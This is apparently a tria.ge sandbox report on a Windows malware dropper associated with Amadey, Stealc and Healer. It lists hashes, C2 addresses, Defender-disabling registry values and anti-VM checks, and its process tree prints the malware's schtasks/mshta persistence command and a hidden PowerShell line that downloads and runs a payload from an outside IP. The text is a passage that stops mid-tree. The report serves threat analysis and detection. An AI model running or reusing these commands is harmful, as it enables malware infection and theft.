Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 05:22
Static task
static1
Behavioral task
behavioral1
Sample
4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
Resource
win10v2004-20250217-en
General
-
Target
4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
-
Size
938KB
-
MD5
9ae9625a633b0cf08bc364845a4df9bb
-
SHA1
669645cd8a9a144f627efea57bd4c8c38b454a40
-
SHA256
4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
-
SHA512
4e64685031c59b302fcfc8af751e8ac426c3f0855bb32788c2684bb40d634c3147142023854748d63a819b62a72bd8034e5cffe2b5ec805fb4067bf65c8017a7
-
SSDEEP
24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8ayOF:nTvC/MTQYxsWR7ayO
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5624-588-0x0000000000CB0000-0x0000000001120000-memory.dmp healer behavioral2/memory/5624-580-0x0000000000CB0000-0x0000000001120000-memory.dmp healer behavioral2/memory/5624-674-0x0000000000CB0000-0x0000000001120000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 299f9f82e8.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 299f9f82e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 299f9f82e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 299f9f82e8.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 299f9f82e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 299f9f82e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 299f9f82e8.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 299f9f82e8.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 299f9f82e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 299f9f82e8.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d8c76c7b0b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3aae3cdde2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a84d3ad71d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 299f9f82e8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 563315ef27.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 3420 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3420 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 32 984 rapes.exe 32 984 rapes.exe 32 984 rapes.exe 51 2556 BitLockerToGo.exe 88 1432 BitLockerToGo.exe 89 984 rapes.exe 89 984 rapes.exe 18 3420 powershell.exe 30 984 rapes.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 299f9f82e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3aae3cdde2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a84d3ad71d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 563315ef27.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d8c76c7b0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 563315ef27.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d8c76c7b0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3aae3cdde2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a84d3ad71d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 299f9f82e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE -
Executes dropped EXE 13 IoCs
pid Process 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 984 rapes.exe 4480 d8c76c7b0b.exe 2900 78de00ab05.exe 2016 78de00ab05.exe 772 rapes.exe 2936 3aae3cdde2.exe 3584 a84d3ad71d.exe 3044 563315ef27.exe 5048 cb0c0b51c3.exe 5624 299f9f82e8.exe 3664 rapes.exe 3420 rapes.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 563315ef27.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3aae3cdde2.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine a84d3ad71d.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 299f9f82e8.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine d8c76c7b0b.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 299f9f82e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 299f9f82e8.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\563315ef27.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110560101\\563315ef27.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb0c0b51c3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110570101\\cb0c0b51c3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\299f9f82e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110580101\\299f9f82e8.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000d000000023d70-241.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 984 rapes.exe 4480 d8c76c7b0b.exe 772 rapes.exe 2936 3aae3cdde2.exe 3584 a84d3ad71d.exe 3044 563315ef27.exe 5624 299f9f82e8.exe 3664 rapes.exe 3420 rapes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2900 set thread context of 2016 2900 78de00ab05.exe 105 PID 4480 set thread context of 2556 4480 d8c76c7b0b.exe 111 PID 2936 set thread context of 1432 2936 3aae3cdde2.exe 122 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2104 2900 WerFault.exe 104 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d8c76c7b0b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78de00ab05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3aae3cdde2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a84d3ad71d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cb0c0b51c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 563315ef27.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language cb0c0b51c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78de00ab05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage cb0c0b51c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 299f9f82e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 3920 taskkill.exe 4860 taskkill.exe 3224 taskkill.exe 836 taskkill.exe 2872 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1304 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 3420 powershell.exe 3420 powershell.exe 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 984 rapes.exe 984 rapes.exe 4480 d8c76c7b0b.exe 4480 d8c76c7b0b.exe 2016 78de00ab05.exe 2016 78de00ab05.exe 2016 78de00ab05.exe 2016 78de00ab05.exe 772 rapes.exe 772 rapes.exe 2936 3aae3cdde2.exe 2936 3aae3cdde2.exe 3584 a84d3ad71d.exe 3584 a84d3ad71d.exe 3584 a84d3ad71d.exe 3584 a84d3ad71d.exe 3584 a84d3ad71d.exe 3584 a84d3ad71d.exe 3044 563315ef27.exe 3044 563315ef27.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5624 299f9f82e8.exe 5624 299f9f82e8.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5624 299f9f82e8.exe 5624 299f9f82e8.exe 5624 299f9f82e8.exe 3664 rapes.exe 3664 rapes.exe 3420 rapes.exe 3420 rapes.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 2900 78de00ab05.exe Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 2872 taskkill.exe Token: SeDebugPrivilege 3920 taskkill.exe Token: SeDebugPrivilege 4860 taskkill.exe Token: SeDebugPrivilege 3224 taskkill.exe Token: SeDebugPrivilege 4776 firefox.exe Token: SeDebugPrivilege 4776 firefox.exe Token: SeDebugPrivilege 5624 299f9f82e8.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 4776 firefox.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe 5048 cb0c0b51c3.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4776 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4808 wrote to memory of 4900 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 84 PID 4808 wrote to memory of 4900 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 84 PID 4808 wrote to memory of 4900 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 84 PID 4808 wrote to memory of 716 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 85 PID 4808 wrote to memory of 716 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 85 PID 4808 wrote to memory of 716 4808 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe 85 PID 4900 wrote to memory of 1304 4900 cmd.exe 87 PID 4900 wrote to memory of 1304 4900 cmd.exe 87 PID 4900 wrote to memory of 1304 4900 cmd.exe 87 PID 716 wrote to memory of 3420 716 mshta.exe 90 PID 716 wrote to memory of 3420 716 mshta.exe 90 PID 716 wrote to memory of 3420 716 mshta.exe 90 PID 3420 wrote to memory of 928 3420 powershell.exe 98 PID 3420 wrote to memory of 928 3420 powershell.exe 98 PID 3420 wrote to memory of 928 3420 powershell.exe 98 PID 928 wrote to memory of 984 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 99 PID 928 wrote to memory of 984 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 99 PID 928 wrote to memory of 984 928 TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE 99 PID 984 wrote to memory of 4480 984 rapes.exe 103 PID 984 wrote to memory of 4480 984 rapes.exe 103 PID 984 wrote to memory of 4480 984 rapes.exe 103 PID 984 wrote to memory of 2900 984 rapes.exe 104 PID 984 wrote to memory of 2900 984 rapes.exe 104 PID 984 wrote to memory of 2900 984 rapes.exe 104 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 2900 wrote to memory of 2016 2900 78de00ab05.exe 105 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 4480 wrote to memory of 2556 4480 d8c76c7b0b.exe 111 PID 984 wrote to memory of 2936 984 rapes.exe 112 PID 984 wrote to memory of 2936 984 rapes.exe 112 PID 984 wrote to memory of 2936 984 rapes.exe 112 PID 984 wrote to memory of 3584 984 rapes.exe 121 PID 984 wrote to memory of 3584 984 rapes.exe 121 PID 984 wrote to memory of 3584 984 rapes.exe 121 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 2936 wrote to memory of 1432 2936 3aae3cdde2.exe 122 PID 984 wrote to memory of 3044 984 rapes.exe 123 PID 984 wrote to memory of 3044 984 rapes.exe 123 PID 984 wrote to memory of 3044 984 rapes.exe 123 PID 984 wrote to memory of 5048 984 rapes.exe 124 PID 984 wrote to memory of 5048 984 rapes.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1304
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE"C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe"C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2556
-
-
-
C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
